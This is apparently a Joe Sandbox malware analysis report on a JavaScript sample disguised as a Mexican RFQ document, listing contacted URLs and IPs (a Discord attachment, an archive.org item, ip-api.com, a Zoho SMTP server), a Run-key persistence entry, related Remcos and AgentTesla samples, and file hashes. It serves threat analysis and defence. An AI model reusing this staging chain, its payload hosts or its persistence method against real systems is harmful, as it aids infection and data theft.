                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://account.dyn.com/powershell.exe, 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ia601606.us.arXR(powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.discordapp.com/attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&powershell.exe, 00000004.00000002.2105359169.000001CE80439000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://go.micropowershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://cdp.thawte.com/ThawteTLSRSACAG1.crl0pInstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://aka.ms/pscore6powershell.exe, 00000002.00000002.2153683025.000001DCD521A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.discordapp.compowershell.exe, 00000004.00000002.2105359169.000001CE80439000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.html0powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ia601606.us.archive.org/10/items/deathnotepowershell.exe, 00000002.00000002.2153683025.000001DCD5A1F000.00000004.00000800.00020000.00000000.sdmptrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://smtp.zoho.euInstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://status.thawte.com0:InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://cdn.discordapp.compowershell.exe, 00000004.00000002.2105359169.000001CE80553000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2105359169.000001CE819FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://ip-api.comInstallUtil.exe, 00000008.00000002.3317780029.00000000029E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://oneget.orgXpowershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2153683025.000001DCD525F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80001000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2153683025.000001DCD5291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80001000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.00000000029E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.vpowershell.exe, 00000004.00000002.2143156846.000001CEE960F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://ia601606.us.archive.orgpowershell.exe, 00000004.00000002.2105359169.000001CE81638000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://oneget.orgpowershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ia601606.us.archive.orgpowershell.exe, 00000004.00000002.2105359169.000001CE80223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmptrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      207.241.227.86
                      ia601606.us.archive.orgUnited States
                      7941INTERNET-ARCHIVEUStrue
                      208.95.112.1
                      ip-api.comUnited States
                      53334TUT-ASUStrue
                      185.230.212.164
                      smtp.zoho.euNetherlands
                      41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHtrue
                      162.159.135.233
                      cdn.discordapp.comUnited States
                      13335CLOUDFLARENETUStrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1499556
                      Start date and time:2024-08-27 07:52:49 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 28s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:11
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:RFQ448903423_MAT_HASUE_de_Mexico.js
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winJS@13/5@4/4
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 81
                      • Number of non-executed functions: 7
                      Cookbook Comments:
                      • Found application associated with file extension: .js
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 768 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      01:53:40API Interceptor41x Sleep call for process: powershell.exe modified
                      01:53:47API Interceptor58x Sleep call for process: InstallUtil.exe modified
                      07:53:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\padral.js
                      07:53:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\padral.js
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      207.241.227.86INQUIRY#46789-AUG24.jsGet hashmaliciousRemcosBrowse
                        Comprovante_Swift.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          Shipping Documents.jsGet hashmaliciousRemcosBrowse
                            shipping documents.jsGet hashmaliciousUnknownBrowse
                              27256APPROVEDACHpmt187023OI2783764.jsGet hashmaliciousUnknownBrowse
                                DHL-66445735750-DHL-66445735750-DHL-66445735750.jsGet hashmaliciousRemcosBrowse
                                  15514541_Doc_Sub(C-A0893)10-08-2024.jsGet hashmaliciousUnknownBrowse
                                    Return_shipping_label.jsGet hashmaliciousUnknownBrowse
                                      INVOICE.jsGet hashmaliciousStormKitty, XWormBrowse
                                        doc_1000050408072024.jsGet hashmaliciousRemcosBrowse
                                          208.95.112.1cotizaci#U00f3n_SIS20240500007257.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          • ip-api.com/line/?fields=hosting
                                          Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF..exeGet hashmaliciousAgentTeslaBrowse
                                          • ip-api.com/line/?fields=hosting
                                          Image Logger Installer.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • ip-api.com/line/?fields=hosting
                                          Fatality.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                          • ip-api.com/json/?fields=225545
                                          smss.exeGet hashmaliciousRMSRemoteAdmin, RDPWrap Tool, xRATBrowse
                                          • ip-api.com/json
                                          RFQ20240513.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          • ip-api.com/line/?fields=hosting
                                          DOCUMENTOSFACTURA_pif.exeGet hashmaliciousAgentTeslaBrowse
                                          • ip-api.com/line/?fields=hosting
                                          Payment Confirmation 26082024.exeGet hashmaliciousAgentTeslaBrowse
                                          • ip-api.com/line/?fields=hosting
                                          crss.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • ip-api.com/line/?fields=hosting
                                          game.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • ip-api.com/line/?fields=hosting
                                          185.230.212.164File.com.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                            Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                              1qwF1J2Njh.exeGet hashmaliciousAgentTeslaBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ip-api.comcotizaci#U00f3n_SIS20240500007257.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF..exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Image Logger Installer.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • 208.95.112.1
                                                Fatality.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                • 208.95.112.1
                                                smss.exeGet hashmaliciousRMSRemoteAdmin, RDPWrap Tool, xRATBrowse
                                                • 208.95.112.1
                                                https://jobs.exjudicata.com/senior-policy-manager-1a1406bf4189Get hashmaliciousUnknownBrowse
                                                • 51.77.64.70
                                                RFQ20240513.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 208.95.112.1
                                                DOCUMENTOSFACTURA_pif.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Payment Confirmation 26082024.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                crss.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • 208.95.112.1
                                                cdn.discordapp.comINQUIRY#46789-AUG24.jsGet hashmaliciousRemcosBrowse
                                                • 162.159.129.233
                                                http://discord.openaiproxy.top/Get hashmaliciousUnknownBrowse
                                                • 162.159.133.233
                                                REV#U0130ZE TEKL#U0130F_01.exeGet hashmaliciousUnknownBrowse
                                                • 162.159.135.233
                                                REV#U0130ZE TEKL#U0130F_01.exeGet hashmaliciousUnknownBrowse
                                                • 162.159.130.233
                                                quote.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 162.159.135.233
                                                abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeGet hashmaliciousCryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLoggerBrowse
                                                • 162.159.130.233
                                                3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                                                • 162.159.130.233
                                                ExeFile (274).exeGet hashmaliciousUnknownBrowse
                                                • 162.159.135.233
                                                ExeFile (308).exeGet hashmaliciousUnknownBrowse
                                                • 162.159.134.233
                                                ExeFile (308).exeGet hashmaliciousUnknownBrowse
                                                • 162.159.129.233
                                                smtp.zoho.euFile.com.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                • 185.230.212.164
                                                Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.230.212.164
                                                Orden#46789_2024_Optoflux_mexico_sderlss.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.230.214.164
                                                Orden#46789_2024_Optoflux_mexico_sderlsTY.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.230.214.164
                                                Orden#46789_2024_Optoflux_mexico_sderlsTYP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 185.230.214.164
                                                okPY77wv6E.exeGet hashmaliciousAgentTeslaBrowse
                                                • 185.230.214.164
                                                RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exeGet hashmaliciousAgentTeslaBrowse
                                                • 185.230.214.164
                                                RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeGet hashmaliciousGuLoaderBrowse
                                                • 185.230.214.164
                                                RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                                                • 185.230.214.164
                                                INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                                                • 185.230.214.164
                                                ia601606.us.archive.orgINQUIRY#46789-AUG24.jsGet hashmaliciousRemcosBrowse
                                                • 207.241.227.86
                                                Comprovante_Swift.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                • 207.241.227.86
                                                Shipping Documents.jsGet hashmaliciousRemcosBrowse
                                                • 207.241.227.86
                                                shipping documents.jsGet hashmaliciousUnknownBrowse
                                                • 207.241.227.86
                                                27256APPROVEDACHpmt187023OI2783764.jsGet hashmaliciousUnknownBrowse
                                                • 207.241.227.86
                                                DHL-66445735750-DHL-66445735750-DHL-66445735750.jsGet hashmaliciousRemcosBrowse
                                                • 207.241.227.86
                                                15514541_Doc_Sub(C-A0893)10-08-2024.jsGet hashmaliciousUnknownBrowse
                                                • 207.241.227.86
                                                Return_shipping_label.jsGet hashmaliciousUnknownBrowse
                                                • 207.241.227.86
                                                INVOICE.jsGet hashmaliciousStormKitty, XWormBrowse
                                                • 207.241.227.86
                                                doc_1000050408072024.jsGet hashmaliciousRemcosBrowse
                                                • 207.241.227.86
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                INTERNET-ARCHIVEUSINQUIRY#46789-AUG24.jsGet hashmaliciousRemcosBrowse
                                                • 207.241.227.86
                                                SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                • 207.241.232.154
                                                RFQ_0826024.xla.xlsxGet hashmaliciousRemcosBrowse
                                                • 207.241.232.154
                                                RFQ-009230820240.xla.xlsxGet hashmaliciousRemcosBrowse
                                                • 207.241.232.154
                                                oothgirl.docGet hashmaliciousRemcosBrowse
                                                • 207.241.232.154
                                                M12_20240821_0.xlsGet hashmaliciousRemcosBrowse
                                                • 207.241.232.154
                                                New order.xlsGet hashmaliciousRemcosBrowse
                                                • 207.241.232.154
                                                Facturas vencidas, 006598, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                • 207.241.232.154
                                                Transferencia - BBVA.vbsGet hashmaliciousAgentTeslaBrowse
                                                • 207.241.232.154
                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.8441.24466.rtfGet hashmaliciousRemcosBrowse
                                                • 207.241.232.154
                                                CLOUDFLARENETUSINQUIRY#46789-AUG24.jsGet hashmaliciousRemcosBrowse
                                                • 162.159.129.233
                                                Pago pendientes.xlsGet hashmaliciousHTMLPhisherBrowse
                                                • 188.114.97.3
                                                FedEx Shipping Document.scr.exeGet hashmaliciousAzorultBrowse
                                                • 188.114.96.3
                                                Pago pendientes.docGet hashmaliciousHTMLPhisherBrowse
                                                • 188.114.97.3
                                                French Group.jsGet hashmaliciousRemcosBrowse
                                                • 104.20.3.235
                                                https://portal.constructivesoftware.com.au/Get hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                http://constructivesoftware.com.auGet hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 172.64.41.3
                                                yIrvIBrYlhvfYLoAlHG2EmUHZ.msiGet hashmaliciousUnknownBrowse
                                                • 104.21.5.173
                                                SecuriteInfo.com.Win32.PWSX-gen.30214.14248.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                COMPUTERLINEComputerlineSchlierbachSwitzerlandCHbat.batGet hashmaliciousAsyncRAT, DcRat, PureLog Stealer, XWorm, zgRATBrowse
                                                • 185.230.212.169
                                                File.com.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                • 185.230.212.164
                                                https://forms.zohopublic.eu/oyika/form/OfficeAdministration/formperma/9Y9iItPBjtbizq-LjIqfCLG9lgQgDpYgginS586dnzMGet hashmaliciousUnknownBrowse
                                                • 89.36.170.147
                                                http://workdrive.zohoexternal.comGet hashmaliciousUnknownBrowse
                                                • 89.36.170.147
                                                https://workdrive.zohoexternal.com/external/writer/46fdf68b2f78265d07797e09c63aeef4064c3374cfc014062660688cb6876b9bGet hashmaliciousUnknownBrowse
                                                • 89.36.170.147
                                                https://diverescueintl.com/Get hashmaliciousHTMLPhisherBrowse
                                                • 89.36.170.147
                                                3533cdbe-ace4-ee24-ff8f-a6fbfe7cf297.emlGet hashmaliciousHTMLPhisherBrowse
                                                • 89.36.170.147
                                                https://news.sky.com.orientcomputer-eg.com/ck1/13ef.6f604c137186924e/54afeda0-5892-11ef-9169-52540048feb1/4a9c32796a4b334297d499ea9c8416521e40b10f/2?e=aIojADma7UHO6n8luDK%2B95xpBNzB5MYBKYeLZ8ZyOu7Aa%2B6p9nC2pijHnhlTxVAZYdVpf6NA96PWWwLveY4KCWpHNDDXbTiOTMiFzovH6LYW6dQ7e4qpdVuaSUp1wm%2By%2FblAF1x6nrjyRRXVcXQOIfo7%2BYq07nWhOzN%2FpZd%2FKYo7PgcoYOZcAKUuxCBOV5egyrKv2HeOtQXceIDZKjV7YQ%3D%3DGet hashmaliciousUnknownBrowse
                                                • 185.230.212.59
                                                https://survey.zohopublic.com/zs/PYD30j?zs_inviteid=866013344e2f6aaa30b0ce407809ff4bd0ed3ef0b6c505e4b8ed99944a376aa9926823bc48ddf2b3a48337595fd132fdc7dd78d5f9b555e70f8018a33749ece953593d840363543c7e497cb3df5edd8a8ce77772c184384877cf08b30c571942a82188865861cee4768abdb6a85121effaf9893caa395668bdc7d2ea3eb1ad70842f3852386887fd2152473c96af2d214aa22073b82ef4bd897283936adbc27354514f9b6787d1b60b4d554452880bf6Get hashmaliciousUnknownBrowse
                                                • 185.230.212.52
                                                https://www.netrust.net/resources/downloads/Get hashmaliciousUnknownBrowse
                                                • 89.36.170.147
                                                TUT-ASUScotizaci#U00f3n_SIS20240500007257.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF..exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Image Logger Installer.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • 208.95.112.1
                                                Fatality.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                • 208.95.112.1
                                                smss.exeGet hashmaliciousRMSRemoteAdmin, RDPWrap Tool, xRATBrowse
                                                • 208.95.112.1
                                                RFQ20240513.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 208.95.112.1
                                                DOCUMENTOSFACTURA_pif.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Payment Confirmation 26082024.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                crss.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • 208.95.112.1
                                                game.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • 208.95.112.1
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eINQUIRY#46789-AUG24.jsGet hashmaliciousRemcosBrowse
                                                • 162.159.135.233
                                                • 207.241.227.86
                                                Address_verification_form_awb_shipping_documents_Invoice_Billof lading000000000000000000000.vbsGet hashmaliciousGuLoaderBrowse
                                                • 162.159.135.233
                                                • 207.241.227.86
                                                French Group.jsGet hashmaliciousRemcosBrowse
                                                • 162.159.135.233
                                                • 207.241.227.86
                                                SecuriteInfo.com.Win32.PWSX-gen.30214.14248.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 162.159.135.233
                                                • 207.241.227.86
                                                QH_Group - Products List 000227.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 162.159.135.233
                                                • 207.241.227.86
                                                https://1b375bcda594bd6f.bet898.vip/Get hashmaliciousUnknownBrowse
                                                • 162.159.135.233
                                                • 207.241.227.86
                                                https://appie.l2m8a19k2.buzz/Get hashmaliciousUnknownBrowse
                                                • 162.159.135.233
                                                • 207.241.227.86
                                                https://steamcommmuinity.com/user1298323/actionGet hashmaliciousUnknownBrowse
                                                • 162.159.135.233
                                                • 207.241.227.86
                                                https://trezlive.com/Get hashmaliciousUnknownBrowse
                                                • 162.159.135.233
                                                • 207.241.227.86
                                                https://yoge0104.github.io/Yoge0104Get hashmaliciousHTMLPhisherBrowse
                                                • 162.159.135.233
                                                • 207.241.227.86
                                                No context
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllult+1:NllUM
                                                MD5:6B6521C07D540BBC0331B46E5883C5F9
                                                SHA1:02764532B6822BB7EA83C5B8253ACE7DB9E43864
                                                SHA-256:C60B4E20C4983CB5ACB5AD25DDC4EEF11E73BFAF3736892987A25FA28486B51C
                                                SHA-512:96D2BD2B357AB2489DD1E80808A2B328B3F8DCAC93E0C6F80FBE30D1F018053D0426EAA34C30EBCC757BD1D6A57B0E78C9E005295123C55C4F621943A4FF5688
                                                Malicious:false
                                                Reputation:low
                                                Preview:@...e................................................@..........
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Entropy (8bit):3.7792090221478505
                                                TrID:
                                                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                • MP3 audio (1001/1) 32.22%
                                                • Lumena CEL bitmap (63/63) 2.03%
                                                • Corel Photo Paint (41/41) 1.32%
